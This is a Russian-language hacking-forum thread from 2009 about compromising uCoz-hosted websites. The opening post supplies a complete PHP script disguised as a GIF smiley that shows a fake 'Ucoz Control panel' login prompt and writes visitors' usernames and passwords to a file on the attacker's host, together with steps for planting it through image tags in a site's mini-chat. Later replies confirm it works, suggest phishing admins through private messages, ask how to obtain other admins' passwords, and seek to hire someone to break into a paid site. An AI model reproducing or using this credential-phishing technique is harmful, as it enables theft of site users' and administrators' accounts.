Форумы Найден способ взлома UcoZ!

Discussion in 'Уязвимости CMS/форумов' started by Artemik, 8 Jan 2009.

  1. cash$$$

    cash$$$ Banned

    Joined:
    6 Jan 2008
    Messages:
    385
    Likes Received:
    246
    Reputations:
    10
    to NooB MC

    Есть такой способ:

    Нужно зарегистрировать хост с поддержкой php (например, http://mysite.phphost.net) . После регистрации льем на фтп скрипт и ставим права на пустой .txt файл, например: passwords.txt (сюда будут присылаться пассы пользователей сайта), и на файл smile.gif. Далее качаем любой смайлик в расширении .gif (типа cool.gif). Потом в блокноте пишем:

    Code:
    <?
    header("Content-type: image/gif");
    $image = imagecreatefromgif('cool.gif');
    if(!$_COOKIE['LOGON'])
    {
     $login = $_SERVER['PHP_AUTH_USER'];
     $pass = $_SERVER['PHP_AUTH_PW'];
    if(strlen($pass) <= 4 || !$login)
     {
      Header('HTTP/1.1 401 Unauthorized');
      Header('WWW-Authenticate: Basic realm="Ucoz Control panel"');
     }
     elseif($login)
     {
    setcookie('LOGON',md5($pass));
    $f = fopen('passwords.txt', 'ab');
    fwrite($f, $login." ||| ".$pass."\r\n");
    fclose($f);
     }
    }
    imagegif($image);
    imagedestroy($image);
    ?>
    После этого сохраняем файл под названием smile, потом меняем расширение на gif.
    Теперь выбираем юкозовский сайт, например http://mysite.ucoz.ru/ потом в мини чате пишем логин, а в содержании сообщения:

    [I*MG]http://mysite.phphost.net/smile.gif[/I*MG]

    Если после этого в мини чате вместо сообщения появился смайлик - значит сайт - уязвимый. После этого у всех кто будет заходить на данную страницу, будет появляться форма, в которую нужно будет ввести логин и пароль.

    Ps: Но этот баг, наверное, уже прикрыли...
     
  2. playhard.g0pr0

    Joined:
    16 Feb 2009
    Messages:
    19
    Likes Received:
    29
    Reputations:
    0
    попробовал на своем сайте все работает
     
    #42 playhard.g0pr0, 16 Feb 2009
    Last edited by a moderator: 17 Feb 2009
  3. Rebit

    Rebit Elder - Старейшина

    Joined:
    7 Aug 2007
    Messages:
    85
    Likes Received:
    214
    Reputations:
    2
    Работа но не на всех сайтах
     
    #43 Rebit, 17 Feb 2009
    Last edited by a moderator: 17 Feb 2009
  4. Nakq

    Nakq New Member

    Joined:
    14 Jan 2009
    Messages:
    9
    Likes Received:
    3
    Reputations:
    0
    Молодцы! Спс!
     
  5. ben1991

    ben1991 New Member

    Joined:
    29 Oct 2008
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    а если я вошол в аккаунт админа , но не главного а второстепенного, я могу редактировать шаблоны но немогу зайти в админку.Какие скрипты применить чтобы найти пароли других админов и админки?
     
  6. BlackDraG

    BlackDraG Elder - Старейшина

    Joined:
    27 May 2008
    Messages:
    0
    Likes Received:
    7
    Reputations:
    0
    Дефейс логина?
    Чтобы отсылал на хост с php скриптом.
     
  7. nik3241

    nik3241 Member

    Joined:
    4 Mar 2008
    Messages:
    0
    Likes Received:
    13
    Reputations:
    0
    ну или фейк авторизации, успех в том случае если включен img, старый способ но по сей день актуальный, хотя в админке укоза img по дефолту вроде отключен
     
    1 person likes this.
  8. sarmat2009

    sarmat2009 New Member

    Joined:
    20 Mar 2009
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Смайл, кстати можно не только в миничат отправлять (в сообщении на форуме к примеру);)
     
  9. jenyavlg

    jenyavlg Banned

    Joined:
    25 Aug 2007
    Messages:
    397
    Likes Received:
    19
    Reputations:
    0
    льем на фтп скрипт
    А где сам скрипт
     
  10. -=$MiRoN$=-

    -=$MiRoN$=- Banned

    Joined:
    5 Apr 2009
    Messages:
    83
    Likes Received:
    28
    Reputations:
    -5
    СПС! Всё дествительно работает!
     
  11. L7ife

    L7ife Member

    Joined:
    27 Jun 2009
    Messages:
    0
    Likes Received:
    8
    Reputations:
    -2
    Сижу,читаю,жру.Вот вы сменили пасы ну и х... с того если есть "секретный код или чёт типа этого (непомнб как точно называется)",макситмум что вы сделаете,то только попортите сайт,по если ещё админ не лох(делает бэкап 1 раз в неделю и хранит у себя на компе)..........
     
    8 people like this.
  12. Drunya

    Drunya New Member

    Joined:
    3 Jul 2009
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    ээ.. чета вот попробовал я на двух своих сайтах и баян... файл с расширением gif не интерпретируются пхп интерпретатором.
    Просто пишет мол картинка повреждена... если попытаться запустить ее прямо с хоста с пхп, а на юкозе просто не отображаецо. Делал все по инструкции, хотя там и делать нечего:) Подскажите, может дыманул я...
    Ах да при этом нормальные картинки с левых хостов отображаются....Как я понял вся проблема в
     
  13. seofilms

    seofilms Banned

    Joined:
    27 May 2009
    Messages:
    66
    Likes Received:
    46
    Reputations:
    14
    Да ты прав, этот баг уже прикрыли, но есть то что они еще незаметили ))) можно написать тоже самое в личном сообщении админу и если он будет дураком то введет свой логин и пароль, 4 человка из 20 вводят ;) в основном на малопосещяемых сайтах ;) так что дерзайте )))
     
  14. seval

    seval New Member

    Joined:
    24 Feb 2009
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    А если админ отключил возможность пользователям добавлять новость?
     
  15. PaRaBe1LuM

    PaRaBe1LuM Member

    Joined:
    15 Jan 2010
    Messages:
    0
    Likes Received:
    10
    Reputations:
    5
    а если платный сайт на укозе? кто возьмется сломать и сколько будет стоить?